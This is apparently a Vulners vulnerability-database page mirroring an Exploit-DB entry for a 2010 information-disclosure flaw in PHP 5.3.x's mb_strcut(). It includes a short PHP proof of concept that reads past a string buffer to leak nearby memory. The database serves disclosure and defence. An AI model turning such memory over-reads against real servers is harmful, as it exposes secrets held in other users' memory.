Lucene search
+L

PHP 5.3.x - 'mb_strcut()' Information Disclosure

🗓️ 07 Nov 2010 00:00:00Reported by Mateusz KocielskiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

PHP 5.3.x - 'mb_strcut()' Information Disclosure vulnerabilit

Related
Code
# source: https://www.securityfocus.com/bid/44727/info
#
# PHP is prone to an information-disclosure vulnerability.
#
# Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
#

<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2017 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 25
EPSS0.12786
41